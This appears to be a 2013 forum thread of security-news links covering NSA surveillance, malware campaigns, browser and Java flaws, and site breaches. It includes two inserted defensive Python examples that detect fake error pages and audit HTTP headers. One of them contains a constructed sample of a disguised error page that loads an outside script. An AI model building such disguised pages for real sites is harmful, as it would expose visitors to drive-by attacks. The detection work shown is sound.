Paul wants to lead Supreme Court challenge to fed's tracking of Americans' calls, emails
Published June 09, 2013
Sen. Rand Paul said Sunday he wants to mount a Supreme Court challenge to the federal government logging Americans’ phone calls and Internet activities.
Cut!
“I’m going to be asking all the Internet providers and all of the phone companies: Ask your customers to join me in a class-action lawsuit,” he said. “If we get 10 million Americans saying we don’t want our phone records looked at, then maybe someone will wake up and something will change in Washington.”
The Whole Article:
http://www.foxnews.com/politics/2013/06/09/paul-wants-to-lead-supreme-court-challenge-to-fed-tracking-americans-calls/
-
HP Insight Diagnostics 9.4.0.4710 multiple vulnerabilities
http://www.kb.cert.org/vuls/id/324668
-
How to disable the Java plug-in in various types of IE browser with a Fix it: http://blogs.technet.com/b/srd/archive/2013/05/29/java-when-you-cannot-let-go.aspx
a “Microsoft Fix it” solution to block all Java web-attack vectors through Internet Explorer. The solution will work for all versions of Java (tested 5 and above) and all supported versions of Internet Explorer (32-bit or 64-bit)....
polonus
-
Hi bob3160 and Asyn,
Well something we expected to be so became more credible with this news.
Yes, and it is a sad thing actually for those corporations that were forced to cooperate.
We as mere users should always have at the back of our heads that all we do on the Internet is actually done in public, same as we would stand on a soapbox in HydePark (only this time on a global scale).
86 Civil Liberties Groups and Internet Companies Demand an End to NSA Spying
https://www.eff.org/deeplinks/2013/06/86-civil-liberties-groups-and-internet-companies-demand-end-nsa-spying
https://blog.mozilla.org/blog/2013/06/11/stopwatching-us-mozilla-launches-massive-campaign-on-digital-surveillance/
https://optin.stopwatching.us/
-
Zeus now spreads as worm: http://blog.trendmicro.com/trendlabs-security-intelligence/going-solo-self-propagating-zbot-malware-spotted/
link article author = TrendLabs' Abigail Pichel (Technical Communications)
polonus
-
Hi Asyn,
More invisibility to PRISM outside the USA. Use an ISP without servers in the USA. Use the I2P overlay network or Tor and an open source browser (non-American builds, unlike Google Chrome), use your provider's web-mail, use YaCy for searching. Use ICQ chat which is now Russian owned and VOIPBuster, use a different mail account for mobile services; these are a few of the steps you could take (tips were taken from link article author Kristian van Tuil, see: http://computerworld.nl/beveiliging/78073-in-6-stappen-buiten-bereik-van-prism).
Personally I do not feel the need for all this, but for those that feel some urge to do so....
For instance loads of tor nodes are owned by amazon, so open to PRISM: http://torstatus.blutmagie.de/ 27 seen with .compute dot amazonaws dot com
I think there really is no escape from this giga data snooping
polonus
-
There may not be any escape Damien but that doesn't mean we should take this laying down.
http://bob3160.blogspot.com/2013/06/personal-information-privacy-and.html
-
polonus, and you think Russia, China and other big governments don't have their own version of PRISM already? :) so suggesting Russian owned ICQ is quite weird ...
-
polonus, and you think Russia, China and other big governments don't have their own version of PRISM already? :) so suggesting Russian owned ICQ is quite weird ...
What are you talking about ??? Who is suggesting what ???
-
Google surveillance far surpasses the NSA, author says
By Wyatt Andrews
June 11, 2013 7:19 PM
Cut!
"For years, Google's computers have scanned the content of millions of Gmails -- Google's popular email service -- in order to figure out what ads the users might respond to. Many users don't realize they've given Google permission to eavesdrop in the agreement that opens their account."
http://www.cbsnews.com/8301-18563_162-57588833/google-surveillance-far-surpasses-the-nsa-author-says/
-
Microsoft Security Bulletin Advance Notification for June 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-jun
Microsoft doesn't close all holes on June patch day
http://www.h-online.com/security/news/item/Microsoft-doesn-t-close-all-holes-on-June-patch-day-1887051.html
-
Google surveillance far surpasses the NSA, author says
By Wyatt Andrews
June 11, 2013 7:19 PM
Cut!
"For years, Google's computers have scanned the content of millions of Gmails -- Google's popular email service -- in order to figure out what ads the users might respond to. Many users don't realize they've given Google permission to eavesdrop in the agreement that opens their account."
http://www.cbsnews.com/8301-18563_162-57588833/google-surveillance-far-surpasses-the-nsa-author-says/
And you actually believe this garbage ???
-
Hi bob3160,
If that would not be so there would not be an open internet ;)
Is Johnny 4745 afraid someone has listened in on his pillow talk? ;D
Damian
-
Users warned to remove Debian Multimedia repository
http://www.h-online.com/security/news/item/Users-warned-to-remove-Debian-Multimedia-repository-1888493.html
http://bits.debian.org/2013/06/remove-debian-multimedia.html
-
Big Brother may not be listening, but he's watching: Why metadata snooping is legal
By Bob Sullivan, Columnist, NBC News
Cut!
Wiretaps and warrants
The Fourth Amendment stems from a simple idea: Law enforcement officials can observe your home from the street, but in most cases they can't barge in unless they prove to a judge they need to. In the digital world, the line between knocking on your door and barging in is much more complicated. And as the analogy breaks down, so too it seems has Fourth Amendment protection.
The Whole Article:
http://redtape.nbcnews.com/_news/2013/06/15/18938604-big-brother-may-not-be-listening-but-hes-watching-why-metadata-snooping-is-legal?lite
-
You are still quoting posts from tainted and partial sources.... IMHO :)
-
Yahoo, Bing Found Directing to Bitcoin Phishing Site (http://threatpost.com/yahoo-bing-found-directing-to-bitcoin-phishing-site/)
(http://trtpost.wpengine.netdna-cdn.com/files/2013/06/gox-680x400.jpg)
-
Oracle Java SE Critical Patch Update Pre-Release Announcement - June 2013
http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html
-
See: http://threattrack.tumblr.com/post/52635380368/wells-fargo-important-document-attachment-spam
domain found here, daily updates: http://malwareurls.joxeankoret.com/normal.txt
polonus
-
Spycam vulnerability reappears in Google Chrome's Flash
http://www.h-online.com/security/news/item/Spycam-vulnerability-reappears-in-Google-Chrome-s-Flash-1892051.html
-
Google Docs - Viewer: https://docs.google.com/viewer actively being abused by Seinup malware: http://www.fireeye.com/blog/technical/malware-research/2013/06/trojan-apt-seinup-hitting-asean.html link article author = Chong Rong Hwa
polonus
-
Google Docs - Viewer: https://docs.google.com/viewer actively being abused by Seinup malware: http://www.fireeye.com/blog/technical/malware-research/2013/06/trojan-apt-seinup-hitting-asean.html link article author = Chong Rong Hwa
polonus
Why do you need the Google Docs Viewer ??? The viewing ability is built directly into Chrome ???
-
Google Docs - Viewer: https://docs.google.com/viewer actively being abused by Seinup malware: http://www.fireeye.com/blog/technical/malware-research/2013/06/trojan-apt-seinup-hitting-asean.html link article author = Chong Rong Hwa
polonus
Why do you need the Google Docs Viewer ??? The viewing ability is built directly into Chrome ???
it is really user choice. some of us choose not to use chrome, so pol's notice is pertinent to those who don't.
-
@mchain & @bob3160
I posted this because that viewer is being abused by malcreants, that is the news here, not why we need that viewer or not,
malcreants use something good and trusted for evil purposes, e.g. to communicate with their malbots!
Another threat: a lot of the most popular WordPress plug-ins may be insecure (20% are holed) and will lead to plenty of hacked websites, read this report:
http://www.checkmarx.com/wp-content/uploads/2013/06/The-Security-State-of-WordPress-Top-50-Plugins.pdf (source: checkmarx source code analysis)
polonus
-
openxadvertising.com Mass Malvertising Campaign
http://research.zscaler.com/2013/06/openxadvertisingcom-mass-malvertising.html
-
openxadvertising.com Mass Malvertising Campaign
http://research.zscaler.com/2013/06/openxadvertisingcom-mass-malvertising.html
The malicious advertisements were delivered from openxadvertising.com, which is currently blocked (http://google.com/safebrowsing/diagnostic?site=openxadvertising.com) by Google SafeBrowsing.
-
Ad injection onto your computer: http://blogs.technet.com/b/mmpc/archive/2013/06/20/ad-injection-and-you-how-adware-gets-on-your-computer.aspx
link article author = Chris Stubbs
polonus
-
MS has released a fixit to block all java in IE
Java is a unique form of extensibility because it can be invoked in the following two ways:
• By using an applet element
• By using an object element that has a CLSID of a Java virtual machine (JVM)
These two invocation methods are subject to different security controls. This Knowledge Base Article contains a Fix it solution to disable the Java web plug-in from being loaded through these controls. The Fix it solution will also disable the Java Network Launching Protocol (JNLP) handler.
http://support.microsoft.com/kb/2751647
-
Malcreants use an instruction trick to circumvent AV detection via undocumented FPU instructions, read: http://blogs.technet.com/b/mmpc/archive/2013/06/24/investigation-of-a-new-undocumented-instruction-trick.aspx
link article author: Daniel Radu MMPC Munich
How are the authors, if they're different people, sharing information? asks the author of the article.
I have recently seen that info on attack code is being shared via hidden URLs injected into innocent websites,
if you don't stumble onto the links by accident via an search engine indexer and searching for the topic you won't find these links...
See: http://lists.nongnu.org/archive/html/qemu-devel/2013-05/msg03684.html for patches on the glitch...
polonus
-
"You can run, but you can't hide" (http://www.zdnet.com/firm-facebooks-shadow-profiles-are-frightening-dossiers-on-everyone-7000017199/)
"Right now commenters across the Internet will be saying, Don't join Facebook or Delete your account.
But it appears that we're subject to Facebook's shadow profiles whether or not we choose to participate."
All of this is the result of Facebook's Shadow Profiling......
-
Google finds up to 10.000 new malicious sites a day: https://www.google.com/transparencyreport/safebrowsing/
polonus
-
Backup program allows root access to LG smartphones
http://www.h-online.com/security/news/item/Backup-program-allows-root-access-to-LG-smartphones-1896506.html
-
Vast majority of malware attacks spawned from legit sites (http://arstechnica.com/security/2013/06/vast-majority-of-malware-attacks-spawned-from-legit-sites/)
(http://cdn.arstechnica.net/wp-content/uploads/2013/06/google-malicious-website-data-640x345.jpg)
-
Mobile malware grows by 614 percent in last year (http://news.cnet.com/8301-1009_3-57591042-83/mobile-malware-grows-by-614-percent-in-last-year/)
(http://asset3.cbsistatic.com/cnwk.1d/i/tim2/2013/06/25/Screen_Shot_2013-06-25_at_6.33.02_PM_610x395.png)
-
Security breach stopped [Opera]
http://my.opera.com/securitygroup/blog/2013/06/26/opera-infrastructure-attack
-
Meet PRISM’s little brother: Socmint (http://arstechnica.com/tech-policy/2013/06/meet-prisms-little-brother-socmint/)
(http://cdn.arstechnica.net/wp-content/uploads/2013/06/cameras-640x428.jpg)
When will "Big Brother" realize that he is infringing on our right to privacy ?
Is all of this really keeping us safe ???
-
Perfect Forward Secrecy can block the NSA from secure web pages, but no one uses it! (http://blogs.computerworld.com/encryption/22366/can-nsa-see-through-encrypted-web-pages-maybe-so)
(Michael Horowitz does a masterful job of breaking down a complex issue into its components.
If security is your thing – this is a must read.)
(http://blogs.computerworld.com/sites/computerworld.com/files/u147/nsa.website.headline.jpg)
-
Heads-up on this warning coming from Lab65's Ahmad Azziz: http://blog.lab69.com/2013/01/404-and-youve-been-exploited.html
Be aware of a trick where a browser displays an error page (PHP/MySQL error, cPanel error, or page not found) with HTTP response 200, but instead it contains malicious JavaScript code on the back end to exploit users when the page is loaded.
polonus
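The heuristic behind that warning is easy to automate for a defender reviewing pages. The following is an added example (not code from the lab69 post or from polonus): it takes a raw HTTP response, decides whether the body reads like an error page (404 text, MySQL or cPanel error strings), and then flags the two things that do not belong together: an error page returned with status 200, and script or iframe tags inside an error page. The two responses are constructed for the example; in real use the raw bytes would come from a fetch of the URL under review.

```python
import re

# Constructed sample responses (not real captures). The first is an honest
# 404; the second mimics the trick: an "error page" delivered with HTTP 200
# that also loads a script from somewhere else.
HONEST_404 = (
    "HTTP/1.1 404 Not Found\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><head><title>404 Not Found</title></head>"
    "<body><h1>Not Found</h1><p>The requested URL was not found.</p></body></html>"
)

FAKE_404 = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><head><title>404 Not Found</title></head>"
    "<body><h1>Not Found</h1>"
    "<script src=\"http://third-party.example/loader.js\"></script>"
    "</body></html>"
)

# Phrases that make a page look like a server or application error page.
ERROR_TEXT = re.compile(
    r"(404 not found|page not found|mysql error|error in your sql syntax|cpanel)",
    re.IGNORECASE,
)
SCRIPT_TAG = re.compile(r"<script\b[^>]*>", re.IGNORECASE)
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status code, headers dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def suspicious_error_page(raw):
    """Return the reasons this response deserves a closer look.

    An empty list means nothing matched: either the page is not an error
    page, or it is one and behaves like one (non-200 status, no scripts).
    """
    status, _, body = parse_response(raw)
    findings = []
    if not ERROR_TEXT.search(body):
        return findings  # not an error page as far as the text goes
    if status == 200:
        findings.append("error page served with HTTP 200")
    scripts = SCRIPT_TAG.findall(body)
    if scripts:
        findings.append(f"{len(scripts)} script tag(s) inside an error page")
    iframes = IFRAME_TAG.findall(body)
    if iframes:
        findings.append(f"{len(iframes)} iframe(s) inside an error page")
    return findings


if __name__ == "__main__":
    for label, raw in (("honest 404", HONEST_404), ("fake 404", FAKE_404)):
        print(label, "->", suspicious_error_page(raw) or "looks normal")
```

The status check alone is not proof of anything (some frameworks return 200 for their own "not found" pages), which is why the script and iframe counts are reported separately: an error page that pulls in a third-party script is the combination worth escalating.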
-
Hard drive-wiping malware part of new wave of threats targeting South Korea
http://arstechnica.com/security/2013/06/hard-drive-wiping-malware-part-of-new-wave-of-threats-targeting-south-korea/
-
Heads-up on this warning coming from Lab65's Ahmad Azziz: http://blog.lab69.com/2013/01/404-and-youve-been-exploited.html
Be aware of a trick where a browser displays an error page (PHP/MySQL error, cPanel error, or page not found) with HTTP response 200, but instead it contains malicious JavaScript code on the back end to exploit users when the page is loaded.
polonus
This is what showed up when I clicked on your link.
-
not strange, since lab69 is a blog for malware analysis.... lots of strange stuff posted there. ;)
-
Heads-up on this warning coming from Lab65's Ahmad Azziz: http://blog.lab69.com/2013/01/404-and-youve-been-exploited.html
Be aware of a trick where a browser displays an error page (PHP/MySQL error, cPanel error, or page not found) with HTTP response 200, but instead it contains malicious JavaScript code on the back end to exploit users when the page is loaded.
polonus
This is what showed up when I clicked on your link.
@Midnight, the website is clean; it's just an FP by BitDefender: https://www.virustotal.com/en/url/1f4576a80272b522dfc66c4d9be47403ba0f799a16cf444a7d077d8b74d4c722/analysis/1372588878/
-
Android Hack-Tool Steals PC Info
http://www.f-secure.com/weblog/archives/00002573.html
-
A devious combo to avoid.....
Two malware programs help each other to beat antivirus detection:
http://www.itworld.com/security/363322/two-malware-programs-help-each-other-stay-computers
polonus
-
Top5 Fake Security Scanners: http://blog.webroot.com/2013/06/27/top-5-fake-security-rogues-of-2013/
link article author = tylermoffitt
polonus
-
Attackers gain access to Ubisoft customer data
http://www.h-online.com/security/news/item/Attackers-gain-access-to-Ubisoft-customer-data-1910357.html
http://blog.ubi.com/security-update-for-all-ubisoft-account-holders/
-
Majority of Windows computers infected through Java: https://www.csis.dk/en/csis/news/3981/ link article author = Peter Kruse
84.3 % of all virus infections can be traced back to the drive-by attacks from malicious or compromised websites
polonus
-
Microsoft Security Bulletin Advance Notification for July 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-jul
-
Wasn't sure where to post this.
http://miami.cbslocal.com/2013/07/07/growing-problem-of-tech-support-scams/
-
Exploit for Android signing hole published
http://www.h-online.com/security/news/item/Exploit-for-Android-signing-hole-published-1914228.html
-
New backdoor in HP server products
http://www.h-online.com/security/news/item/New-backdoor-in-HP-server-products-1916506.html
-
Telstra storing data on behalf of US government
http://www.theage.com.au/it-pro/security-it/telstra-storing-data-on-behalf-of-us-government-20130712-hv0w4.html
-
Microsoft gave NSA's PRISM access to Skype, Outlook.com and SkyDrive
http://www.h-online.com/security/news/item/Microsoft-gave-NSA-s-PRISM-access-to-Skype-Outlook-com-and-SkyDrive-1916730.html
http://www.guardian.co.uk/world/2013/jul/11/microsoft-nsa-collaboration-user-data
-
FBI-themed ransomware now affecting OS X users (http://www.slashgear.com/fbi-themed-ransomware-now-affecting-os-x-users-15290470/)
(http://cdn.slashgear.com/wp-content/uploads/2013/07/ransomware1-580x394.png)
-
Critical vulnerabilities in numerous ASUS routers
http://www.h-online.com/security/news/item/Critical-vulnerabilities-in-numerous-ASUS-routers-1918469.html
-
10 year old API vulnerability, issue 69, troubles java 7: http://archives.neohapsis.com/archives/fulldisclosure/2013-07/0172.html
article author Adam Gowdiak
If you can do without Java, uninstall it.
polonus
PS Let us make it a two-in-one java alert: http://www.securityweek.com/multiple-java-instances-keep-enterprise-systems-vulnerable-attack-report
link source Security Week's Fahmida Y. Rashid
-
it would be really nice if Oracle joined the MS security initiative ...
since Adobe and some others joined it, it really helped to decrease the amount of critical vulnerabilities ...
anyway the whole Java 7 story is real tragedy (i can understand Java 6 was old code and under massive amount of attacks)
thanks a lot for posting this ;( the details about going totally around the Java sandbox are nasty
-
Chinese Hackers discovered second Android master key vulnerability
http://thehackernews.com/2013/07/chinese-hackers-discovered-second.html
-
Windows Media Player 12 Plugin: Arbitrary File Read Vulnerability
http://www.rawsec.net/wmp-vulnerability.html
-
Ubuntu Forums got hacked
http://ubuntuforums.org/announce.html
-
Hi forum friends,
During my automated security scannings I have found that an enormous amount of websites are still vulnerable to configuration insecurities. These insecurities are grossly underestimated by webmasters and sloppy IT staff alike, opening up a goldmine of unintended information for malicious attackers. At least security through obscurity should be a priority.
Important insecurities found:
1. excessive headers (info can be used to pinpoint security flaws to attackers).
2. clickjacking (X-Frame-Options header not returned), malcontent can be embedded in a frame.
ASP netsites can be scanned here at: https://asafaweb.com/Scan?Url=
Other sites can be scanned at: safersite.de
polonus
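Both of the checks polonus lists can be run locally against a site's response headers. The following is an added example (not code from polonus, asafaweb or safersite.de): it takes the headers of one response as a dict and reports version-revealing headers (Server with a version string, X-Powered-By, X-AspNet-Version and similar) and the absence of any framing restriction, where either X-Frame-Options DENY/SAMEORIGIN or a Content-Security-Policy frame-ancestors directive counts as protection. The two header sets are constructed for the example, one sloppy and one hardened.

```python
import re

# Headers that exist only to announce the framework or its version.
LEAKY_HEADERS = (
    "x-powered-by",
    "x-aspnet-version",
    "x-aspnetmvc-version",
    "x-generator",
)
# A bare product name in Server: leaks little; a version string is what lets
# an attacker match the host against known flaws, so only that is flagged.
VERSION = re.compile(r"\d+\.\d+")

# Constructed sample responses (not captures from any real site).
SLOPPY = {
    "Server": "Apache/2.2.22 (Ubuntu)",
    "X-Powered-By": "PHP/5.3.10-1ubuntu3",
    "Content-Type": "text/html; charset=UTF-8",
}
HARDENED = {
    "Server": "Apache",
    "X-Frame-Options": "SAMEORIGIN",
    "Content-Type": "text/html; charset=UTF-8",
}


def audit_headers(headers):
    """Return a list of findings for one response's headers (empty = clean)."""
    h = {name.lower(): value for name, value in headers.items()}
    findings = []

    # 1. excessive headers
    server = h.get("server", "")
    if VERSION.search(server):
        findings.append(f"excessive header: Server: {server}")
    for name in LEAKY_HEADERS:
        if name in h:
            findings.append(f"excessive header: {name}: {h[name]}")

    # 2. clickjacking: framing must be restricted by X-Frame-Options
    # (DENY or SAMEORIGIN) or by a CSP frame-ancestors directive.
    xfo = h.get("x-frame-options", "").strip().upper()
    csp = h.get("content-security-policy", "")
    if xfo not in ("DENY", "SAMEORIGIN") and "frame-ancestors" not in csp:
        findings.append(
            "clickjacking: no X-Frame-Options DENY/SAMEORIGIN and no CSP frame-ancestors"
        )
    return findings


if __name__ == "__main__":
    for label, headers in (("sloppy", SLOPPY), ("hardened", HARDENED)):
        print(label, "->", audit_headers(headers) or "clean")
```

On the server side the fixes are one-liners: Apache's `ServerTokens Prod` trims the Server header to the product name, `Header always set X-Frame-Options "SAMEORIGIN"` (mod_headers) adds the framing restriction, and `expose_php = Off` in php.ini removes the X-Powered-By header that PHP adds by default.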
-
Urausy Lockscreen: Your computer will remain locked for 3 days, 11 hours and 20 minutes! (https://blog.avast.com/2013/07/24/urausy-lockscreen-your-computer-will-remain-locked-for-3-days-11-hours-and-20-minutes/)
(https://blog.avast.com/wp-content/uploads/2013/07/00-urausy_mainlogo.png)
The good thing for us is that it's detected by avast!. :)
-
Who do you trust ???
Virus total scan results:
https://www.virustotal.com/en/file/7d01bd6c9fef5b1cdddee4de1d5a03edce07c2b706fc566753949992775fcf67/analysis/1372871468/
or avast!:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1374664221488-2273.png)
Link received from a "friend" first analyzed and reported clean.
Thanks avast! for always having my back!
-
Use different passwords for different sites.
Hello,
You are receiving this message because you have an account registered with this address on ubuntuforums.org.
The Ubuntu forums software was compromised by an external attacker. As a result, the attacker has gained access to read your username, email address and an encrypted copy of your password from the forum database.
If you have used this password and email address to authenticate at any other website, you are urged to reset the password on those accounts immediately as the attacker may be able to use the compromised personal information to access these other accounts. It is important to have a distinct password for different accounts.
The ubuntuforums.org website is currently offline and we are working to restore this service. Please take the time to change your ubuntuforums.org account password when service is restored.
We apologize for any inconvenience to the Ubuntu community, thank you for your understanding.
The Canonical Sysadmins.
-
Multisystem Trojan Janicab attacks Windows and MacOSX via scripts
Analysis Report in the Avast Blog:http://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/
There are also many JS: Detections added with Database version 130724-0
http://www.avast.com/de-de/virus-update-history
-
Orbit Downloader versions causing massive SYN flooding
http://seclists.org/bugtraq/2013/Jul/155
-
Watch for malicious links! https://www.facebook.com/photo.php?fbid=10151592091117426&set=a.449448457425.237286.38282497425&type=1&relevant_count=1
Not sure if this goes here: http://www.tomsguide.com/us/free-antivirus-best-popular-most-effective-review,review-1788-2.html (For users that think avast! will protect against anything, even from themselves).
One item left out: Use of a torrent program: Use of such is not a problem as the program itself may be clean, but connections to unknown computers and unknown status of such is.
-
Malwarebytes Adopts Aggressive PUP Policy
http://blog.malwarebytes.org/news/2013/07/malwarebytes-adopts-aggressive-pup-policy/
-
Digital Carjackers Show Off New Attacks
http://www.youtube.com/watch?v=oqe6S6m73Zw&feature=youtu.be
I hope that this does not happen to me sometime........
-
Ubuntu Forums got hacked
http://ubuntuforums.org/announce.html
Ubuntu Forums are back up and a post mortem
http://blog.canonical.com/2013/07/30/ubuntu-forums-are-back-up-and-a-post-mortem/
-
Satis automatic toilets vulnerable to hacker attacks, Trustwave warns
http://www.news.com.au/technology/biztech/satis-automatic-toilets-vulnerable-to-hacker-attacks-trustwave-warns/story-fn5lic6c-1226691757637
-
Satis automatic toilets vulnerable to hacker attacks, Trustwave warns
http://www.news.com.au/technology/biztech/satis-automatic-toilets-vulnerable-to-hacker-attacks-trustwave-warns/story-fn5lic6c-1226691757637
I wouldn't regard that as something worthy of a security warning notice, it could be rather embarrassing though if you're on the toilet and some kid with too much time on his hands wants to start playing around with your toilet while you are on it ;D
-
More than that Craig, I've seen kids in the men's room playing games while sitting on the toilet and it was loud, and sometimes I yelled out to them and said hurry up and finish your toilet job ;D ;D
Edit: Kids can do strange things to their iPhone if you know what I mean without their parents knowing and I have to go some place else while they enjoy themselves, and I don't bloody want to know about it ;D ;D
-
Google Chrome security flaw offers unrestricted password access
http://www.theguardian.com/technology/2013/aug/07/google-chrome-password-security-flaw
one reason why i never store passwords in browser....
-
Google Chrome security flaw offers unrestricted password access
http://www.theguardian.com/technology/2013/aug/07/google-chrome-password-security-flaw
one reason why i never store passwords in browser....
Not a bug, Google designed it that way. Why they did that, I do not know.
-
Zeus P2P Protocol is Transitioning to a New Port Range
Info through the Polish Computer Emergency Response Team (CERT)
https://blog.damballa.com/archives/2084
polonus
-
Thieves Reaching for Linux—”Hand of Thief” Trojan Targets Linux #INTH3WILD
https://blogs.rsa.com/thieves-reaching-for-linux-hand-of-thief-trojan-targets-linux-inth3wild/
-
Microsoft Security Bulletin Advance Notification for August 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-aug
-
Adobe Reader XI (11.0.03) Remote Code Execution Exploit
http://www.youtube.com/watch?v=0xSw0S8PvP8&feature=youtu.be
-
Popular download management program has hidden DDoS component (http://www.pcworld.com/article/2047240/popular-download-management-program-has-hidden-ddos-component-researchers-say.html)
If you have to use a download manager, choose it carefully.
-
Fake Malwarebytes Scammer Surveys Victims (http://blog.malwarebytes.org/news/2013/08/fake-malwarebytes-scammer-surveys-victims/)
-
Justice Department slip names Google in data demands case. (http://news.cnet.com/8301-1023_3-57600140-93/justice-department-slip-names-google-in-data-demands-case/)
Google is one of the few companies thought to have contested such requests.
-
Cybercriminals target Android platforms.
http://www.av-comparatives.org/wp-content/uploads/2013/08/apkstores_investigation_2013.pdf
Not a good idea to use a 3rd party app store.
-
Virus targets the social network in new fraud twist
http://www.reuters.com/article/2013/08/16/us-instagram-cyberfraud-idUSBRE97F0XD20130816
-
Linux HID security flaws
http://www.openwall.com/lists/oss-security/2013/08/28/13
-
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5
if you run recent vB forums , rush and fix
-
Java Code Signing Failures
http://www.duckware.com/tech/javacodesigningfailure.html
-
Pre-cooked weaknesses in encryption security: http://www.theguardian.com/world/2013/sep/05/nsa-gchq-encryption-codes-security
polonus
-
Microsoft Security Bulletin Advance Notification for September 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-sep
-
New Ransomware Crypto Lock is encrypting all files on your hard drive
http://blog.emsisoft.com/
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3AWin32%2FCrilock.A&ThreatID=-2147284168#tab=2
-
New Ransomware Crypto Lock is encrypting all files on your hard drive
http://blog.emsisoft.com/
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3AWin32%2FCrilock.A&ThreatID=-2147284168#tab=2
Using WinPatrol will also alert you if any attempt is made to change the registry RE: auto run Key.
-
New Ransomware Crypto Lock is encrypting all files on your hard drive
http://blog.emsisoft.com/
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3AWin32%2FCrilock.A&ThreatID=-2147284168#tab=2
Using WinPatrol will also alert you if any attempt is made to change the registry RE: auto run Key.
TR/Crilock.B is Detected by Avast: https://www.virustotal.com/en/file/d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9/analysis/
-
Thanks for that info. ;)
-
Vulnerability in Internet Explorer could allow remote code execution
https://support.microsoft.com/kb/2887505
-
Vulnerability in Internet Explorer could allow remote code execution
https://support.microsoft.com/kb/2887505
Additional information here: http://nakedsecurity.sophos.com/2013/09/18/internet-explorer-zero-day-exploit-prompts-microsoft-to-publish-emergency-fix-it/ Note: No Fix-it solution available for IE 64-bit iterations yet. Digital signature for Fix-it 51001 32-bit released September 16, 2013.
-
Malwarebytes Database optimization today 9/17/2013
http://forums.malwarebytes.org/index.php?showtopic=133418
-
Malwarebytes Database optimization today 9/17/2013
http://forums.malwarebytes.org/index.php?showtopic=133418
Thanks for the heads up Pondus ;)
-
Thanks from me too, Pondus. Since I've got the free version and just do an on-demand scan once a week, I only update shortly before scanning. I'd noticed in the past that the download size would sometimes drop sharply (typically by about a meg) from one week to the next, but never really wondered why.
-
iOS 7 security flaws uncovered as new iPhones released
http://www.theage.com.au/digital-life/mobiles/ios-7-security-flaws-uncovered-as-new-iphones-released-20130920-2u3ed.html
-
iOS 7 Bug Lets Anyone Bypass iPhone's Lockscreen To Hijack Photos, Email, Or Twitter
http://www.forbes.com/sites/andygreenberg/2013/09/19/ios-7-bug-lets-anyone-bypass-iphones-lockscreen-to-hijack-photos-email-or-twitter/
-
Update on IE use-after-free vulnerability
Tech blog Microsoft Security Response Center announces new Fix-it and out-of-band release Windows Update patch for all versions of IE: http://blogs.technet.com/b/msrc/archive/2012/09/19/internet-explorer-fix-it-available-now-security-update-scheduled-for-friday.aspx
-
Threat Level Yellow: Protection recommendations regarding Internet Explorer exploits in the wild
https://isc.sans.edu/forums/diary/Threat+Level+Yellow+Protection+recommendations+regarding+Internet+Explorer+exploits+in+the+wild/16634
http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx
-
Threat Level Yellow: Protection recommendations regarding Internet Explorer exploits in the wild
https://isc.sans.edu/forums/diary/Threat+Level+Yellow+Protection+recommendations+regarding+Internet+Explorer+exploits+in+the+wild/16634
http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx
Simple remedy is to use a different browser till the fix is available.
-
More information about IE, all versions, exploits, attacks:
http://www.pcadvisor.co.uk/news/security/3470426/internet-explorer-zero-day-attackers-linked-to-bit9-hackers/
Some published reports state that this attack team uses a weaponized version and so far has been used to attack only enterprise/commercial users using IE 8 and IE 9.
-
Data Broker Giants Hacked by ID Theft Service
http://krebsonsecurity.com/2013/09/data-broker-giants-hacked-by-id-theft-service/
-
Starting next year: https://cabforum.org/pipermail/public/2013-September/002233.html
Google Weaker SSL-Certificate alerts
This also seen to these developments: http://www.theguardian.com/world/2013/sep/05/nsa-gchq-encryption-codes-security
Also Bruce Schneier warned about these issues leaving everyone less secure.
In the meantime I check with Calomel SSL Validation in firefox: https://addons.mozilla.org/En-us/firefox/addon/calomel-ssl-validation/
polonus
-
So Google is going to implement their own certificate verification system like in Firefox. ;)
-
Hi Steven Winderlich,
Seems so,
Well I like a check like this example from DigiCert® SSL Installation Diagnostics Tool:
DNS resolves 'www.security.nl' to 213.156.0.246
HTTP Server Header: Apache
SSL certificate
Common Name = www.security.nl
Subject Alternative Names = www.security.nl
Issuer = Thawte DV SSL CA
Serial Number = 67ED771B1120A17564A4685737F1D84A
SHA1 Thumbprint = 3C6925620CBFBE09098886F4306F32DE0A363E29
Key Length = 2048 bit
Signature algorithm = SHA1 + RSA (good)
Secure Renegotiation: Supported
SSL ciphers supported by the server
TLS_RSA_WITH_RC4_128_MD5
TLS_RSA_WITH_RC4_128_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA
TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_DHE_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_DHE_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_AES_128_CBC_SHA256
TLS_RSA_WITH_AES_256_CBC_SHA256
TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
